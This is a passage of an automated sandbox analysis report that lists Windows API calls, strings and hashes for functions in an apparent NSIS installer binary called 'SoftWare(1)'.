                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                      • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                      • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                      • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D79,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                      • String ID: F$A
                                                                                                                                                                                                                                      • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D79,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426D79,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                      • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                      • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                      • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
